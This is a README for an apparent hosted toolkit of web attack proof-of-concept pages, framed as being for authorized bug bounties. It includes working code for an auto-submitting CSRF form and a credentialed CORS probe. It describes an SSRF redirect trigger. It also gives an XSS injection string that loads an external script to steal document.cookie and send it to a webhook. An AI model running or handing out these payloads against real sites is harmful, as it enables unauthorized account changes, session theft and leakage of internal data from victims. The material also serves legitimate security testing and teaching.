ETHICAL SECURITY PoC HUB

Private Research & Authorized Testing Tools

**CRITICAL NOTE:** All testing conducted is **strictly authorized** and **scoped** for Bug Bounty Programs or legal Pen-Tests. **Do not use these tools on unauthorized targets.**

Base Attacker URL:

Every usage URL below is written against this base, shown as `[BASE_URL]`. Replace `yourusername.github.io` with the domain your own GitHub Pages site is served from, and keep the trailing slash so the page names append cleanly.

Available PoC Generators

1. Cross-Site Request Forgery (CSRF)

Launch: CSRF Attack Generator (POST)
**Usage URL:** [BASE_URL]csrf_attack.html?url=VULNERABLE_ACTION_URL&param1=value1&param2=value2...
**Goal:** Submit a state-changing POST (e.g., an account-settings change) from the victim's browser so that it carries the victim's session cookies. If the session cookie is `SameSite=Lax` or `Strict`, the browser will not attach it to a cross-site POST and the PoC fails regardless of whether the endpoint checks a CSRF token, so confirm the cookie attributes first.
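The core of the generator, as an added example that is not the repository's own `csrf_attack.html`: it parses the PoC page's query string, takes `url` as the form action, turns every other parameter into a hidden field, and auto-submits the form from the victim's browser. The target URL and parameter names in the comments are placeholders.

```javascript
// Added example (not the repository's csrf_attack.html): the core of an
// auto-submitting POST CSRF page. Given the PoC page's query string
// (?url=<action>&p1=v1&p2=v2 ...), it builds a form whose action is the
// target URL and whose hidden inputs carry every other parameter, then
// submits it so the request goes out with the victim's cookies attached.

// Escape a string for placement inside an HTML attribute value, so a
// parameter value containing quotes or angle brackets cannot break out of
// the generated markup and corrupt the PoC page.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Parse the PoC page's own query string. `url` is the form action; every
// other key/value pair becomes a hidden field. Returns null if `url` is
// missing or is not an absolute http(s) URL (refusing javascript:/data:
// keeps a shared PoC host from being turned into an open redirector).
function parseCsrfSpec(search) {
  const params = new URLSearchParams(search);
  const action = params.get('url');
  if (!action) return null;
  let parsed;
  try { parsed = new URL(action); } catch { return null; }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  params.delete('url');
  const fields = [];
  for (const [name, value] of params) fields.push({ name, value });
  return { action: parsed.href, fields };
}

// Render the self-submitting form. The enctype is the browser default
// application/x-www-form-urlencoded; an endpoint that only accepts JSON and
// enforces its Content-Type will reject this, which is itself worth noting.
function buildCsrfForm(search) {
  const spec = parseCsrfSpec(search);
  if (!spec) return null;
  const inputs = spec.fields
    .map(f => `  <input type="hidden" name="${escapeAttr(f.name)}" value="${escapeAttr(f.value)}">`)
    .join('\n');
  return [
    `<form id="csrf" method="POST" action="${escapeAttr(spec.action)}">`,
    inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit();</script>',
  ].join('\n');
}

// In a browser the page calls this on load. In a non-browser runtime such as
// Node `document` is undefined and nothing is rendered, so the builder
// functions above can still be exercised directly.
function renderCsrfPage() {
  if (typeof document === 'undefined') return;
  const html = buildCsrfForm(window.location.search);
  document.body.innerHTML = html || '<p>Missing or invalid url= parameter.</p>';
}
renderCsrfPage();
```

If the action URL has a query string of its own, percent-encode it in the `url` parameter; otherwise its `&`-separated pairs are parsed as extra hidden fields rather than as part of the action.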

2. Cross-Origin Resource Sharing (CORS)

Launch: CORS Misconfiguration Tester
**Usage URL:** [BASE_URL]cors_test.html?target=VULNERABLE_ENDPOINT_URL
**Goal:** Attempt to read an authenticated response cross-origin. The request is sent with `credentials: 'include'`, so it only succeeds if the target echoes the attacker origin in `Access-Control-Allow-Origin` and also sends `Access-Control-Allow-Credentials: true`; a wildcard `*` is never honoured by the browser for credentialed requests, so a wildcard alone is not an exploitable finding.
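Two halves of a credentialed CORS check, as an added example that is not the repository's `cors_test.html`: `classifyCors()` applies the browser's rules to response headers you captured out of band (for instance with `curl -H "Origin: https://yourusername.github.io"`, since the browser will not expose `Access-Control-Allow-Origin` to script without `Access-Control-Expose-Headers`), and `probeCors()` is the in-page request that either reads the body or is blocked. The origins and endpoint names are placeholders.

```javascript
// Added example (not the repository's cors_test.html). classifyCors() says,
// from captured response headers, whether a page at attackerOrigin could read
// an authenticated response; probeCors() is the browser-side request.

// Browser rules for a credentialed cross-origin read:
//   * Access-Control-Allow-Origin must equal the requesting origin exactly
//     ("null" matches sandboxed/opaque origins); "*" is rejected when
//     credentials are sent.
//   * Access-Control-Allow-Credentials must be exactly "true".
function classifyCors(headers, attackerOrigin) {
  // Case-insensitive header lookup over a plain {name: value} object.
  const get = name => {
    for (const key of Object.keys(headers)) {
      if (key.toLowerCase() === name) return headers[key];
    }
    return null;
  };
  const acao = get('access-control-allow-origin');
  const acac = get('access-control-allow-credentials');
  if (acao === null) return 'no-cors-headers';
  if (acao === '*') {
    // Anyone can read public data, but the browser refuses to expose a
    // credentialed response behind a wildcard, so nothing private leaks.
    return 'wildcard-only';
  }
  if (acao !== attackerOrigin && acao !== 'null') return 'origin-not-allowed';
  if (acac !== 'true') return 'origin-allowed-no-credentials';
  return acao === 'null'
    ? 'null-origin-with-credentials'      // reachable from a sandboxed iframe
    : 'reflected-origin-with-credentials'; // the classic exploitable case
}

// Browser side: send a credentialed cross-origin GET and try to read the body.
// A TypeError from fetch() means the browser blocked the read, i.e. the target
// does not allow this origin, or allows it without credentials.
async function probeCors(target) {
  try {
    const res = await fetch(target, { credentials: 'include', mode: 'cors' });
    const body = await res.text();
    return { readable: true, status: res.status, body };
  } catch (err) {
    return { readable: false, error: String(err) };
  }
}
```

Run `classifyCors` over headers captured for several `Origin` values (your PoC host, a subdomain of the target, `null`), since reflection is often limited to a pattern and the interesting finding is which pattern.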

3. Server-Side Request Forgery (SSRF - Blind OOB)

Launch: SSRF Out-of-Band Trigger (HTML/JS Redirect)
**Usage URL:** [BASE_URL]ssrf_trigger.html?log=YOUR_WEBHOOK_URL
**Injection String:** Inject the full URL above into the target's vulnerable URL parameter (e.g., image loading, file fetching). A static page can only redirect client-side (meta refresh or JavaScript), so a hit on the webhook proves the server-side fetcher follows such redirects; a plain HTTP client that does not will stop at the trigger page and log nothing, in which case inject the webhook URL directly.

4. Cross-Site Scripting (XSS - Cookie Exfiltration)

View: XSS Exfiltration Payload (`xss_payload.js`)
**Injection String:** <script src="[BASE_URL]xss_payload.js?log=YOUR_WEBHOOK_URL"></script>
**Goal:** Load the external JS file (`xss_payload.js`) to read `document.cookie` and send it to your webhook. Only non-HttpOnly cookies are reachable this way; the tag must land in a context the target renders as HTML, and a `script-src` CSP that does not allow your PoC host will block the load.

Logging Endpoint Requirement

Since this repository is static (GitHub Pages), the data-exfiltration PoCs (XSS, SSRF) need a third-party logging endpoint to receive the hit. Use a service like webhook.site or Beeceptor for the WEBHOOK_URL placeholder. Anything captured there (session cookies, internal SSRF responses) is stored by that third party, so use a fresh, unguessable endpoint per engagement and delete it when the report is filed.